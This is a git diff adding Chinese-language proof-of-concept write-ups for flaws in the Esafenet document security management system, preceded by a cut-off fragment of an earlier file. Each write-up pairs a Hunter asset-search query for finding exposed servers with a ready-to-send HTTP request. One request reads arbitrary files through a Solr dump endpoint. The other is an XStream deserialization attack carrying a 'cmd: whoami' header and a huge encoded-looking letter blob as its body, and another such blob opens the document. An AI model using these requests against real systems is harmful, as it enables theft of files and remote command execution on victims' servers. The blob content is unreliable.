JKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706607134756-ccdbaf5a-6a38-4dd7-a172-4869f69ec73f.png](./img/d0a2xi_uNq20Xpju/1706607134756-ccdbaf5a-6a38-4dd7-a172-4869f69ec73f-876568.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ci9g75o23gp4oqap>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md
new file mode 100644
index 0000000..e4405a8
--- /dev/null
+++ b/亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统dump存在任意文件读取漏洞
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统dump存在任意文件读取漏洞。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/4wb9My-pXr8E4yXJ/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-964287.png)
+
+# 四、漏洞复现
+```plain
+POST /solr/flow/debug/dump?param=ContentStreams HTTP/1.1
+Host: 192.168.31.24:8090
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: image/avif,image/webp,*/*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: JSESSIONID=31E80EEC9EE4DC0835A362E81A9D179F
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+
+stream.url=file:///C:\Program Files\
+```
+
+![1705153475375-338c2585-3f41-423d-9df8-cdef41bf28dc.png](./img/4wb9My-pXr8E4yXJ/1705153475375-338c2585-3f41-423d-9df8-cdef41bf28dc-651879.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pt6h9gddl8ipaiz8>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..b9e16d2
--- /dev/null
+++ b/亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统formType存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统formType存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/YqHsAYGn1uPt10CJ/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-633419.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/formType HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNM